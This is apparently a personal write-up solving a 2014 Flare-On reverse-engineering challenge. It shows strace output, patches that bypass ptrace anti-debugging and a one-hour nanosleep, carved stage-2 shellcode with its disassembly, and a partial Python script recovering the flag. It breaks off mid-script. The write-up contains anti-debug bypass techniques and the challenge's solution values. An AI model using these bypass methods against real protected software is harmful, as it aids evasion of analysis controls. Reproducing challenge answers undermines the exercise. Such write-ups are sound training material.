remnux@remnux:~/Documents/Flare-on/2014/Chall5$ na

remnux@remnux:~/Documents/Flare-on/2014/Chall5$ ltrace ./e7bc5d2c0cf4480348f5504196561297 arg1 agr2
Couldn't find .dynsym or .dynstr in "/proc/2156/exe"
remnux@remnux:~/Documents/Flare-on/2014/Chall5$ bad

remnux@remnux:~/Documents/Flare-on/2014/Chall5$ ltrace ./e7bc5d2c0cf4480348f5504196561297 arg1 agr2 arg3
Couldn't find .dynsym or .dynstr in "/proc/2160/exe"
remnux@remnux:~/Documents/Flare-on/2014/Chall5$ stahp
ltrace ./e7bc5d2c0cf4480348f5504196561297 arg1 agr2 arg3 agr4
Couldn't find .dynsym or .dynstr in "/proc/2162/exe"
remnux@remnux:~/Documents/Flare-on/2014/Chall5$ stahp

strace shows how a program talks to the Linux kernel.
The binary initializes normally, performs minimal environment setup, does not receive required arguments, immediately fails its internal validation logic, prints "no", and exits with a fixed failure code.
No user-controlled input is processed at all meaning the program expects specific arguments, and if they are not present or not correct, it terminates instantly.

remnux@remnux:~/Documents/Flare-on/2014/Chall5$ strace ./e7bc5d2c0cf4480348f5504196561297
execve("./e7bc5d2c0cf4480348f5504196561297", ["./e7bc5d2c0cf4480348f55041965612"...], 0x7ffd6d797520 /* 49 vars */) = 0
uname({sysname="Linux", nodename="remnux", ...}) = 0
brk(NULL)                               = 0x3fde1000
brk(0x3fde21c0)                         = 0x3fde21c0
arch_prctl(ARCH_SET_FS, 0x3fde1880)     = 0
brk(0x3fe031c0)                         = 0x3fe031c0
brk(0x3fe04000)                         = 0x3fe04000
fstat(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(0x88, 0), ...}) = 0
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f74a9d75000
write(1, "no\n", 3no
)                     = 3
exit_group(52)                          = ?
+++ exited with 52 +++

# Running Strace with 2 arguments
remnux@remnux:~/Documents/Flare-on/2014/Chall5$ strace ./e7bc5d2c0cf4480348f5504196561297 arg1 arg2
execve("./e7bc5d2c0cf4480348f5504196561297", ["./e7bc5d2c0cf4480348f55041965612"..., "arg1", "arg2"], 0x7ffdb7a46ad0 /* 49 vars */) = 0
uname({sysname="Linux", nodename="remnux", ...}) = 0
brk(NULL)                               = 0x7018000
brk(0x70191c0)                          = 0x70191c0
arch_prctl(ARCH_SET_FS, 0x7018880)      = 0
brk(0x703a1c0)                          = 0x703a1c0
brk(0x703b000)                          = 0x703b000
ptrace(PTRACE_TRACEME)                  = -1 EPERM (Operation not permitted)
fstat(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(0x88, 0), ...}) = 0
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fb585c32000
write(1, "Program received signal SIGSEGV,"..., 52Program received signal SIGSEGV, Segmentation fault
) = 52
exit_group(9001)                        = ?
+++ exited with 41 +++

This is simplest anti-debugging technique in Linux, simply,
- https://reverseengineering.stackexchange.com/questions/1930/detecting-tracing-in-linux/1931#1931
Here is the linux syscall table, https://web.archive.org/web/20201218060355/http://blog.rchapman.org/posts/Linux_System_Call_Table_for_x86_64/.

if (ptrac(PTRACE_TRACEME, 0, 1, 0) == -1) BeingDebugged = true;

Advance Static Analysis

Here is the reference of sys_ptrace in sub_4742B0 function, so rename with mw_syscall_anti_debug_ptrace
The ptrace system call (sys_ptrace) in Linux is used by a tracer process to monitor and control a trace process, generally returning 0 on success or -1 on error.

this mw_anti_debug_ptrace is referenced in another function which is checking the return value and if it is -1 which means failed then it will crash and return Segmentation Fault so we have to patch that by replacing 74 (jz) conditional jump with EB (jmp) unconditional jump.
I used this as reference,
- https://c9x.me/x86/html/file_module_x86_id_147.html

    if ( (mw_anti_debug_ptrace(0, 0, 1u, 0) & 0x8000000000000000LL) != 0LL )
    {
      sub_45EBE0((__int64)"Program received signal SIGSEGV, Segmentation fault");
      sub_45E790(9001);
    }

Patch 1: ptrace patching

So to patch that
I need to first get opcodes to identify the hex sequence so to do that i used ida's patch feature and get the sequence of opcodes,

74 14 BF 50 3B 4F 00 E8 B8 F9 03 00 BF 29 23 00

I can use HxD, to change 74 to EB,

After that, i open it in ida and as you can see that it is taking unconditional jump with any condition so the patch worked perfectly.

Now this command no longer given seg fault,

┌──(b14cky㉿DESKTOP-VRSQRAJ)-[~/]
└─$ strace -i ./e7bc5d2c0cf4480348f5504196561297.patched arg1 arg2

[00007add30ede557] execve("./e7bc5d2c0cf4480348f5504196561297.patched", ["./e7bc5d2c0cf4480348f55041965612"..., "arg1", "arg2"], 0x7fff3abb55b8 /* 35 vars */) = 0
[00000000004a9297] uname({sysname="Linux", nodename="DESKTOP-VRSQRAJ", ...}) = 0
[00000000004aa78a] brk(NULL)            = 0x27391000
[00000000004aa78a] brk(0x273921c0)      = 0x273921c0
[000000000045e3f5] arch_prctl(ARCH_SET_FS, 0x27391880) = 0
[00000000004aa78a] brk(0x273b31c0)      = 0x273b31c0
[00000000004aa78a] brk(0x273b4000)      = 0x273b4000
[000000000047431b] ptrace(PTRACE_TRACEME) = -1 EPERM (Operation not permitted)
[0000000000473e44] fstat(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(0x88, 0), ...}) = 0
[000000000047509a] mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x778d0840d000
[0000000000473f50] write(1, "bad\n", 4bad
) = 4
[0000000000473dd8] exit_group(420)      = ?
[????????????????] +++ exited with 164 +++

Now lets analyze the sub_435E20 which has bad string so i renamed it as mw_bad_str and by doing some digging i can see that it is checking that argument length is 10 or not.

By analyzing further we understand that the string "bngcg`debd" is XOR'ed with 0x56 to obtain the value of the 1st argument.

By doing XOR i get this value 4815162342, which is exactly 10 digit long so i passed this as argument in patched program,

We can see a nanosleep at offset 0x473d50.

┌──(b14cky㉿DESKTOP-VRSQRAJ)-[~/]
└─$ strace -i ./e7bc5d2c0cf4480348f5504196561297.patched 4815162342 arg2

[00007f2fa72de557] execve("./e7bc5d2c0cf4480348f5504196561297.patched", ["./e7bc5d2c0cf4480348f55041965612"..., "4815162342", "arg2"], 0x7ffcc1afea98 /* 35 vars */) = 0
[00000000004a9297] uname({sysname="Linux", nodename="DESKTOP-VRSQRAJ", ...}) = 0
[00000000004aa78a] brk(NULL)            = 0x2c36a000
[00000000004aa78a] brk(0x2c36b1c0)      = 0x2c36b1c0
[000000000045e3f5] arch_prctl(ARCH_SET_FS, 0x2c36a880) = 0
[00000000004aa78a] brk(0x2c38c1c0)      = 0x2c38c1c0
[00000000004aa78a] brk(0x2c38d000)      = 0x2c38d000
[000000000047431b] ptrace(PTRACE_TRACEME) = -1 EPERM (Operation not permitted)
[000000000047c9c0] rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
[000000000047c882] rt_sigaction(SIGCHLD, NULL, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
[000000000047c9c0] rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
[0000000000473d50] nanosleep({tv_sec=3600, tv_nsec=0}, ^C{tv_sec=3581, tv_nsec=387430080}) = ? ERESTART_RESTARTBLOCK (Interrupted by signal)

nanosleep(3600 seconds); which is 1 hour,
it is used for
- Waste analyst time
- Beat sandbox timeouts
- Make sample look "hung"
At this 0x473d50 offset it it doing syscall to nanosleep, and the function is sub_473D40.
In IDA Pro, we confirm 0x63 (35) is moved to EAX and syscall is then called.
Still referring to the syscall table, we confirm it corresponds to nanosleep.
https://man7.org/linux/man-pages/man2/nanosleep.2.html

Patch 2: nanosleep patch

We can see that nanosleep is called 2 times in the function.
Let's patch the code by replacing syscall with NOP's, as follows:
- So same as previously we grep the hex stream which is this,

B8 23 00 00 00 0F 05

Using HxD we will patch that,

After that i checked the diff both and here is what i got,

< e7bc5d2c0cf4480348f5504196561297.patched2:     file format elf64-x86-64
---
> e7bc5d2c0cf4480348f5504196561297.patched2.bak:     file format elf64-x86-64
122582,122588c122582,122583
<   473d49:     90                      nop
<   473d4a:     90                      nop
<   473d4b:     90                      nop
<   473d4c:     90                      nop
<   473d4d:     90                      nop
<   473d4e:     90                      nop
<   473d4f:     90                      nop
---
>   473d49:     b8 23 00 00 00          mov    eax,0x23
>   473d4e:     0f 05                   syscall
122595,122601c122590,122591
<   473d6a:     90                      nop
<   473d6b:     90                      nop
<   473d6c:     90                      nop
<   473d6d:     90                      nop
<   473d6e:     90                      nop
<   473d6f:     90                      nop
<   473d70:     90                      nop
---
>   473d6a:     b8 23 00 00 00          mov    eax,0x23
>   473d6f:     0f 05                   syscall

Now we know that this first argument but what about second argument,
So i dig little and found that some bytes are being encoded using base64.
I got into the habit of copying the base64 bytes and setting up breakpoints every once in a while to get back to a checkpoint after each crash.
sub_401164 function decodes the bytes from base64.

After some analysis i found that those bytes are shellcode,
This is the flow of shellcode function,

entry -> 
sub_452079 -> 
    sub_44D525 -> 
        sub_44BE43 -> 
            sub_44B942 (Decompile_problem) -> mw_base64_decode
                                           -> mw_shellcode_sus

Advance Dynamic Analysis

I used edb tool for dynamic debugging for elf,
So i go to that 0x44bb2b location and i found that it is calling, as discussed previously,

00000000:0044bb2b ff d2    call rdx

So we can dump it by doing follow in dump of rdx and we get the shellcode,
I carve the shellcode and remove some unnecessary bytes,

I step into the function and see where shellcode ends and it is ending on this last operation, so up till this i kept and remove remaining bytes,

0x00007ffd6741cc8c: 80 38 D7 cmp byte ptr [eax], 0xd7

Stage 2 Shellcode Analysis

Initial Triage

File Type: shellcode.bin: data
Size: 607 bytes
SHA256: 85b70829d62ab78429754247036a540afdb3548608cef9bbde53bef1f6ccd8c5

Basic Static Analysis

I checked VT for this hash, but it gives no results,
So i upload it and check whether it gives something, but nothing

Advance Static Analysis

This is 2nd stage shellcode carved from 1st stage elf,

48 89 f8 e8 00 00 00 00 48 8b 1c 24 48 83 c3 0a eb 0a 48 31 d2 48 31 c0 b0 3c 0f 05 c0 08 f2 80 38 1b 74 02 ff e3 48 83 c0 01 80 30 40 80 30 f2 80 30 b3 80 38 30 74 02 ff e3 48 83 c0 01 80 30 71 80 38 1f 74 02 ff e3 48 83 c0 01 80 00 a3 c0 08 bc 80 38 b0 74 02 ff e3 48 83 c0 01 80 28 79 80 38 e8 74 02 ff e3 48 83 c0 01 c0 08 82 80 28 28 80 38 f6 74 02 ff e3 48 83 c0 01 80 28 b0 c0 08 4d 80 00 2c 80 38 1f 74 02 ff e3 48 83 c0 01 80 00 54 c0 00 99 80 30 b8 c0 08 2a 80 00 3f 80 38 af 74 02 ff e3 48 83 c0 01 c0 08 ba 80 38 5d 74 02 ff e3 48 83 c0 01 80 30 ed c0 08 6c 80 00 30 80 38 29 74 02 ff e3 48 83 c0 01 80 28 bf 80 38 b5 74 02 ff e3 48 83 c0 01 c0 00 bc 80 00 8c c0 00 7b 80 28 31 80 00 63 80 38 a5 74 02 ff e3 48 83 c0 01 c0 00 20 c0 00 16 80 30 ae c0 00 98 80 38 f3 74 02 ff e3 48 83 c0 01 c0 08 6e 80 00 d2 80 38 a6 74 02 ff e3 48 83 c0 01 80 00 34 80 38 62 74 02 ff e3 48 83 c0 01 80 00 cd 80 28 10 80 00 62 80 30 b2 80 38 32 74 02 ff e3 48 83 c0 01 80 30 b7 80 30 73 c0 08 07 80 38 eb 74 02 ff e3 48 83 c0 01 80 00 34 80 28 61 c0 08 36 80 00 5b 80 28 4c 80 38 0b 74 02 ff e3 48 83 c0 01 80 00 5a 80 38 9a 74 02 ff e3 48 83 c0 01 c0 08 a2 80 38 99 74 02 ff e3 48 83 c0 01 80 30 7e 80 28 e7 80 38 2b 74 02 ff e3 48 83 c0 01 80 28 b8 80 30 86 80 00 4e c0 08 4a c0 00 57 80 38 af 74 02 ff e3 48 83 c0 01 c0 08 86 80 30 e8 c0 00 95 80 30 4a 80 30 ad 80 38 c3 74 02 ff e3 48 83 c0 01 c0 08 45 80 30 cc 80 00 1c 80 38 03 74 02 ff e3 48 83 c0 01 80 28 4a 80 38 e3 74 02 ff e3 48 83 c0 01 80 30 a5 c0 08 90 80 38 ca 74 02 ff e3 48 83 c0 01 c0 08 de c0 00 36 80 30 78 80 28 d8 80 38 3e 74 02 ff e3 48 83 c0 01 80 00 b5 80 28 ad c0 08 89 c0 00 a2 c0 00 11 80 38 d8 74 02 ff e3 48 83 c0 01 80 00 40 80 28 21 c0 08 c0 80 38 82 74 02 ff e3 48 83 c0 01 c0 00 e3 80 38 7b 74 02 ff e3 48 83 c0 01 80 28 78 c0 08 f6 80 38 d7

And this is actual disassembled assembly,

0x0000000000000000:  48                dec     eax
0x0000000000000001:  89 F8             mov     eax, edi
0x0000000000000003:  E8 00 00 00 00    call    8
0x0000000000000008:  48                dec     eax
0x0000000000000009:  8B 1C 24          mov     ebx, dword ptr [esp]
0x000000000000000c:  48                dec     eax
0x000000000000000d:  83 C3 0A          add     ebx, 0xa
0x0000000000000010:  EB 0A             jmp     0x1c
0x0000000000000012:  48                dec     eax
0x0000000000000013:  31 D2             xor     edx, edx
0x0000000000000015:  48                dec     eax
0x0000000000000016:  31 C0             xor     eax, eax
0x0000000000000018:  B0 3C             mov     al, 0x3c
0x000000000000001a:  0F 05             syscall 
0x000000000000001c:  C0 08 F2          ror     byte ptr [eax], 0xf2
0x000000000000001f:  80 38 1B          cmp     byte ptr [eax], 0x1b
0x0000000000000022:  74 02             je      0x26
0x0000000000000024:  FF E3             jmp     ebx
0x0000000000000026:  48                dec     eax
0x0000000000000027:  83 C0 01          add     eax, 1
0x000000000000002a:  80 30 40          xor     byte ptr [eax], 0x40
0x000000000000002d:  80 30 F2          xor     byte ptr [eax], 0xf2
0x0000000000000030:  80 30 B3          xor     byte ptr [eax], 0xb3
0x0000000000000033:  80 38 30          cmp     byte ptr [eax], 0x30
0x0000000000000036:  74 02             je      0x3a
0x0000000000000038:  FF E3             jmp     ebx
0x000000000000003a:  48                dec     eax
0x000000000000003b:  83 C0 01          add     eax, 1
0x000000000000003e:  80 30 71          xor     byte ptr [eax], 0x71
0x0000000000000041:  80 38 1F          cmp     byte ptr [eax], 0x1f
0x0000000000000044:  74 02             je      0x48
0x0000000000000046:  FF E3             jmp     ebx
0x0000000000000048:  48                dec     eax
0x0000000000000049:  83 C0 01          add     eax, 1
0x000000000000004c:  80 00 A3          add     byte ptr [eax], 0xa3
0x000000000000004f:  C0 08 BC          ror     byte ptr [eax], 0xbc
0x0000000000000052:  80 38 B0          cmp     byte ptr [eax], 0xb0
0x0000000000000055:  74 02             je      0x59
0x0000000000000057:  FF E3             jmp     ebx
0x0000000000000059:  48                dec     eax
0x000000000000005a:  83 C0 01          add     eax, 1
0x000000000000005d:  80 28 79          sub     byte ptr [eax], 0x79
0x0000000000000060:  80 38 E8          cmp     byte ptr [eax], 0xe8
0x0000000000000063:  74 02             je      0x67
0x0000000000000065:  FF E3             jmp     ebx
0x0000000000000067:  48                dec     eax
0x0000000000000068:  83 C0 01          add     eax, 1
0x000000000000006b:  C0 08 82          ror     byte ptr [eax], 0x82
0x000000000000006e:  80 28 28          sub     byte ptr [eax], 0x28
0x0000000000000071:  80 38 F6          cmp     byte ptr [eax], 0xf6
0x0000000000000074:  74 02             je      0x78
0x0000000000000076:  FF E3             jmp     ebx
0x0000000000000078:  48                dec     eax
0x0000000000000079:  83 C0 01          add     eax, 1
0x000000000000007c:  80 28 B0          sub     byte ptr [eax], 0xb0
0x000000000000007f:  C0 08 4D          ror     byte ptr [eax], 0x4d
0x0000000000000082:  80 00 2C          add     byte ptr [eax], 0x2c
0x0000000000000085:  80 38 1F          cmp     byte ptr [eax], 0x1f
0x0000000000000088:  74 02             je      0x8c
0x000000000000008a:  FF E3             jmp     ebx
0x000000000000008c:  48                dec     eax
0x000000000000008d:  83 C0 01          add     eax, 1
0x0000000000000090:  80 00 54          add     byte ptr [eax], 0x54
0x0000000000000093:  C0 00 99          rol     byte ptr [eax], 0x99
0x0000000000000096:  80 30 B8          xor     byte ptr [eax], 0xb8
0x0000000000000099:  C0 08 2A          ror     byte ptr [eax], 0x2a
0x000000000000009c:  80 00 3F          add     byte ptr [eax], 0x3f
0x000000000000009f:  80 38 AF          cmp     byte ptr [eax], 0xaf
0x00000000000000a2:  74 02             je      0xa6
0x00000000000000a4:  FF E3             jmp     ebx
0x00000000000000a6:  48                dec     eax
0x00000000000000a7:  83 C0 01          add     eax, 1
0x00000000000000aa:  C0 08 BA          ror     byte ptr [eax], 0xba
0x00000000000000ad:  80 38 5D          cmp     byte ptr [eax], 0x5d
0x00000000000000b0:  74 02             je      0xb4
0x00000000000000b2:  FF E3             jmp     ebx
0x00000000000000b4:  48                dec     eax
0x00000000000000b5:  83 C0 01          add     eax, 1
0x00000000000000b8:  80 30 ED          xor     byte ptr [eax], 0xed
0x00000000000000bb:  C0 08 6C          ror     byte ptr [eax], 0x6c
0x00000000000000be:  80 00 30          add     byte ptr [eax], 0x30
0x00000000000000c1:  80 38 29          cmp     byte ptr [eax], 0x29
0x00000000000000c4:  74 02             je      0xc8
0x00000000000000c6:  FF E3             jmp     ebx
0x00000000000000c8:  48                dec     eax
0x00000000000000c9:  83 C0 01          add     eax, 1
0x00000000000000cc:  80 28 BF          sub     byte ptr [eax], 0xbf
0x00000000000000cf:  80 38 B5          cmp     byte ptr [eax], 0xb5
0x00000000000000d2:  74 02             je      0xd6
0x00000000000000d4:  FF E3             jmp     ebx
0x00000000000000d6:  48                dec     eax
0x00000000000000d7:  83 C0 01          add     eax, 1
0x00000000000000da:  C0 00 BC          rol     byte ptr [eax], 0xbc
0x00000000000000dd:  80 00 8C          add     byte ptr [eax], 0x8c
0x00000000000000e0:  C0 00 7B          rol     byte ptr [eax], 0x7b
0x00000000000000e3:  80 28 31          sub     byte ptr [eax], 0x31
0x00000000000000e6:  80 00 63          add     byte ptr [eax], 0x63
0x00000000000000e9:  80 38 A5          cmp     byte ptr [eax], 0xa5
0x00000000000000ec:  74 02             je      0xf0
0x00000000000000ee:  FF E3             jmp     ebx
0x00000000000000f0:  48                dec     eax
0x00000000000000f1:  83 C0 01          add     eax, 1
0x00000000000000f4:  C0 00 20          rol     byte ptr [eax], 0x20
0x00000000000000f7:  C0 00 16          rol     byte ptr [eax], 0x16
0x00000000000000fa:  80 30 AE          xor     byte ptr [eax], 0xae
0x00000000000000fd:  C0 00 98          rol     byte ptr [eax], 0x98
0x0000000000000100:  80 38 F3          cmp     byte ptr [eax], 0xf3
0x0000000000000103:  74 02             je      0x107
0x0000000000000105:  FF E3             jmp     ebx
0x0000000000000107:  48                dec     eax
0x0000000000000108:  83 C0 01          add     eax, 1
0x000000000000010b:  C0 08 6E          ror     byte ptr [eax], 0x6e
0x000000000000010e:  80 00 D2          add     byte ptr [eax], 0xd2
0x0000000000000111:  80 38 A6          cmp     byte ptr [eax], 0xa6
0x0000000000000114:  74 02             je      0x118
0x0000000000000116:  FF E3             jmp     ebx
0x0000000000000118:  48                dec     eax
0x0000000000000119:  83 C0 01          add     eax, 1
0x000000000000011c:  80 00 34          add     byte ptr [eax], 0x34
0x000000000000011f:  80 38 62          cmp     byte ptr [eax], 0x62
0x0000000000000122:  74 02             je      0x126
0x0000000000000124:  FF E3             jmp     ebx
0x0000000000000126:  48                dec     eax
0x0000000000000127:  83 C0 01          add     eax, 1
0x000000000000012a:  80 00 CD          add     byte ptr [eax], 0xcd
0x000000000000012d:  80 28 10          sub     byte ptr [eax], 0x10
0x0000000000000130:  80 00 62          add     byte ptr [eax], 0x62
0x0000000000000133:  80 30 B2          xor     byte ptr [eax], 0xb2
0x0000000000000136:  80 38 32          cmp     byte ptr [eax], 0x32
0x0000000000000139:  74 02             je      0x13d
0x000000000000013b:  FF E3             jmp     ebx
0x000000000000013d:  48                dec     eax
0x000000000000013e:  83 C0 01          add     eax, 1
0x0000000000000141:  80 30 B7          xor     byte ptr [eax], 0xb7
0x0000000000000144:  80 30 73          xor     byte ptr [eax], 0x73
0x0000000000000147:  C0 08 07          ror     byte ptr [eax], 7
0x000000000000014a:  80 38 EB          cmp     byte ptr [eax], 0xeb
0x000000000000014d:  74 02             je      0x151
0x000000000000014f:  FF E3             jmp     ebx
0x0000000000000151:  48                dec     eax
0x0000000000000152:  83 C0 01          add     eax, 1
0x0000000000000155:  80 00 34          add     byte ptr [eax], 0x34
0x0000000000000158:  80 28 61          sub     byte ptr [eax], 0x61
0x000000000000015b:  C0 08 36          ror     byte ptr [eax], 0x36
0x000000000000015e:  80 00 5B          add     byte ptr [eax], 0x5b
0x0000000000000161:  80 28 4C          sub     byte ptr [eax], 0x4c
0x0000000000000164:  80 38 0B          cmp     byte ptr [eax], 0xb
0x0000000000000167:  74 02             je      0x16b
0x0000000000000169:  FF E3             jmp     ebx
0x000000000000016b:  48                dec     eax
0x000000000000016c:  83 C0 01          add     eax, 1
0x000000000000016f:  80 00 5A          add     byte ptr [eax], 0x5a
0x0000000000000172:  80 38 9A          cmp     byte ptr [eax], 0x9a
0x0000000000000175:  74 02             je      0x179
0x0000000000000177:  FF E3             jmp     ebx
0x0000000000000179:  48                dec     eax
0x000000000000017a:  83 C0 01          add     eax, 1
0x000000000000017d:  C0 08 A2          ror     byte ptr [eax], 0xa2
0x0000000000000180:  80 38 99          cmp     byte ptr [eax], 0x99
0x0000000000000183:  74 02             je      0x187
0x0000000000000185:  FF E3             jmp     ebx
0x0000000000000187:  48                dec     eax
0x0000000000000188:  83 C0 01          add     eax, 1
0x000000000000018b:  80 30 7E          xor     byte ptr [eax], 0x7e
0x000000000000018e:  80 28 E7          sub     byte ptr [eax], 0xe7
0x0000000000000191:  80 38 2B          cmp     byte ptr [eax], 0x2b
0x0000000000000194:  74 02             je      0x198
0x0000000000000196:  FF E3             jmp     ebx
0x0000000000000198:  48                dec     eax
0x0000000000000199:  83 C0 01          add     eax, 1
0x000000000000019c:  80 28 B8          sub     byte ptr [eax], 0xb8
0x000000000000019f:  80 30 86          xor     byte ptr [eax], 0x86
0x00000000000001a2:  80 00 4E          add     byte ptr [eax], 0x4e
0x00000000000001a5:  C0 08 4A          ror     byte ptr [eax], 0x4a
0x00000000000001a8:  C0 00 57          rol     byte ptr [eax], 0x57
0x00000000000001ab:  80 38 AF          cmp     byte ptr [eax], 0xaf
0x00000000000001ae:  74 02             je      0x1b2
0x00000000000001b0:  FF E3             jmp     ebx
0x00000000000001b2:  48                dec     eax
0x00000000000001b3:  83 C0 01          add     eax, 1
0x00000000000001b6:  C0 08 86          ror     byte ptr [eax], 0x86
0x00000000000001b9:  80 30 E8          xor     byte ptr [eax], 0xe8
0x00000000000001bc:  C0 00 95          rol     byte ptr [eax], 0x95
0x00000000000001bf:  80 30 4A          xor     byte ptr [eax], 0x4a
0x00000000000001c2:  80 30 AD          xor     byte ptr [eax], 0xad
0x00000000000001c5:  80 38 C3          cmp     byte ptr [eax], 0xc3
0x00000000000001c8:  74 02             je      0x1cc
0x00000000000001ca:  FF E3             jmp     ebx
0x00000000000001cc:  48                dec     eax
0x00000000000001cd:  83 C0 01          add     eax, 1
0x00000000000001d0:  C0 08 45          ror     byte ptr [eax], 0x45
0x00000000000001d3:  80 30 CC          xor     byte ptr [eax], 0xcc
0x00000000000001d6:  80 00 1C          add     byte ptr [eax], 0x1c
0x00000000000001d9:  80 38 03          cmp     byte ptr [eax], 3
0x00000000000001dc:  74 02             je      0x1e0
0x00000000000001de:  FF E3             jmp     ebx
0x00000000000001e0:  48                dec     eax
0x00000000000001e1:  83 C0 01          add     eax, 1
0x00000000000001e4:  80 28 4A          sub     byte ptr [eax], 0x4a
0x00000000000001e7:  80 38 E3          cmp     byte ptr [eax], 0xe3
0x00000000000001ea:  74 02             je      0x1ee
0x00000000000001ec:  FF E3             jmp     ebx
0x00000000000001ee:  48                dec     eax
0x00000000000001ef:  83 C0 01          add     eax, 1
0x00000000000001f2:  80 30 A5          xor     byte ptr [eax], 0xa5
0x00000000000001f5:  C0 08 90          ror     byte ptr [eax], 0x90
0x00000000000001f8:  80 38 CA          cmp     byte ptr [eax], 0xca
0x00000000000001fb:  74 02             je      0x1ff
0x00000000000001fd:  FF E3             jmp     ebx
0x00000000000001ff:  48                dec     eax
0x0000000000000200:  83 C0 01          add     eax, 1
0x0000000000000203:  C0 08 DE          ror     byte ptr [eax], 0xde
0x0000000000000206:  C0 00 36          rol     byte ptr [eax], 0x36
0x0000000000000209:  80 30 78          xor     byte ptr [eax], 0x78
0x000000000000020c:  80 28 D8          sub     byte ptr [eax], 0xd8
0x000000000000020f:  80 38 3E          cmp     byte ptr [eax], 0x3e
0x0000000000000212:  74 02             je      0x216
0x0000000000000214:  FF E3             jmp     ebx
0x0000000000000216:  48                dec     eax
0x0000000000000217:  83 C0 01          add     eax, 1
0x000000000000021a:  80 00 B5          add     byte ptr [eax], 0xb5
0x000000000000021d:  80 28 AD          sub     byte ptr [eax], 0xad
0x0000000000000220:  C0 08 89          ror     byte ptr [eax], 0x89
0x0000000000000223:  C0 00 A2          rol     byte ptr [eax], 0xa2
0x0000000000000226:  C0 00 11          rol     byte ptr [eax], 0x11
0x0000000000000229:  80 38 D8          cmp     byte ptr [eax], 0xd8
0x000000000000022c:  74 02             je      0x230
0x000000000000022e:  FF E3             jmp     ebx
0x0000000000000230:  48                dec     eax
0x0000000000000231:  83 C0 01          add     eax, 1
0x0000000000000234:  80 00 40          add     byte ptr [eax], 0x40
0x0000000000000237:  80 28 21          sub     byte ptr [eax], 0x21
0x000000000000023a:  C0 08 C0          ror     byte ptr [eax], 0xc0
0x000000000000023d:  80 38 82          cmp     byte ptr [eax], 0x82
0x0000000000000240:  74 02             je      0x244
0x0000000000000242:  FF E3             jmp     ebx
0x0000000000000244:  48                dec     eax
0x0000000000000245:  83 C0 01          add     eax, 1
0x0000000000000248:  C0 00 E3          rol     byte ptr [eax], 0xe3
0x000000000000024b:  80 38 7B          cmp     byte ptr [eax], 0x7b
0x000000000000024e:  74 02             je      0x252
0x0000000000000250:  FF E3             jmp     ebx
0x0000000000000252:  48                dec     eax
0x0000000000000253:  83 C0 01          add     eax, 1
0x0000000000000256:  80 28 78          sub     byte ptr [eax], 0x78
0x0000000000000259:  C0 08 F6          ror     byte ptr [eax], 0xf6
0x000000000000025c:  80 38 D7          cmp     byte ptr [eax], 0xd7

As you can see, for each letter, there are transformations (ror, rol, xor, add, sub) applied to the letter provided. The result is then compared to an expected result. If it succeeds (expected result), the program continues and if it fails, it exits.
Since we have the result of the transformations for each letter, it is possible to reverse the logic to get the initial letter. Let's take an example (letter 4). The code is as follows:

add byte ptr [rax], 0xa3
ror byte ptr [rax], 0xbc
cmp byte ptr [rax], 0xb0

As you can see it is character by character check so we have to make script to automate it,

This script reverses a byte-by-byte verification routine or decryption in the binary to recover the correct second command-line argument.
In short, you have to enter 2nd flag as arg2 and it will perform certain operation with each character and compare it and if succeed then proceed.
So we can build flag from this operation by reverse decoding it.
Script Taken from: https://www.aldeid.com/wiki/The-FLARE-On-Challenge-01/Challenge-6

#!/usr/bin/env python

# source for rol and ror: http://www.falatic.com/index.php/108/python-and-bitwise-rotation
# Rotate left. Set max_bits to 8.
rol = lambda val, r_bits, max_bits=8: \
    (val << r_bits%max_bits) & (2**max_bits-1) | \
    ((val & (2**max_bits-1)) >> (max_bits-(r_bits%max_bits)))
 
# Rotate right. Set max_bits to 8.
ror = lambda val, r_bits, max_bits=8: \
    ((val & (2**max_bits-1)) >> r_bits%max_bits) | \
    (val << (max_bits-(r_bits%max_bits)) & (2**max_bits-1))

l = []

### Letter 1
"""
ror byte ptr [rax], 0xf2
cmp byte ptr [rax], 27
"""
l.append( rol(27, 0xf2) )

### Letter 2
"""
xor byte ptr [rax], 64
xor byte ptr [rax], 0xf2
xor byte ptr [rax], 0xb3
cmp byte ptr [rax], 48
"""
l.append( 48 ^ 0xb3 ^ 0xf2 ^ 64 )

### Letter 3
"""
xor byte ptr [rax], 113
cmp byte ptr [rax], 31
"""
l.append( 31 ^ 113 )

### letter 4
"""
add byte ptr [rax], 0xa3
ror byte ptr [rax], 0xbc
cmp byte ptr [rax], 0xb0
"""
l.append( rol(0xb0, 0xbc) - 0xa3 )

### letter 5
"""
sub byte ptr [rax], 121
cmp byte ptr [rax], 0xe8
"""
l.append( 0xe8 + 121 )

### letter 6
"""
ror byte ptr [rax], 0x82
sub byte ptr [rax], 40
cmp byte ptr [rax], 0xf6
"""
l.append( rol(0xf6 + 40, 0x82) )

### letter 7
"""
sub byte ptr [rax], 0xb0
ror byte ptr [rax], 77
add byte ptr [rax], 44
cmp byte ptr [rax], 31
"""
l.append( rol(31 - 44, 77) + 0xb0 )

### letter 8
"""
add byte ptr [rax], 84
rol byte ptr [rax], 0x99
xor byte ptr [rax], 0xb8
ror byte ptr [rax], 42
add byte ptr [rax], 63
cmp byte ptr [rax], 0xaf
"""
l.append( ror(rol(0xaf - 63, 42) ^ 0xb8, 0x99) - 84 )

### letter 9
"""
ror byte ptr [rax], 0xba
cmp byte ptr [rax], 93
"""
l.append( rol(93, 0xba) )

### letter 10
"""
xor byte ptr [rax], 0xed
ror byte ptr [rax], 108
add byte ptr [rax], 48
cmp byte ptr [rax], 41
"""
l.append( rol(41 - 48, 108) ^ 0xed )

### letter 11
"""
sub byte ptr [rax], 0xbf
cmp byte ptr [rax], 0xb5
"""
l.append( 0xb5 + 0xbf )

### letter 12
"""
rol byte ptr [rax], 0xbc
add byte ptr [rax], 0x8c
rol byte ptr [rax], 123
sub byte ptr [rax], 49
add byte ptr [rax], 99
cmp byte prt [rax], 0xa5
"""
l.append( ror(ror(0xa5 - 99 + 49, 123) - 0x8c, 0xbc) )

### letter 13
"""
rol byte ptr [rax], 32
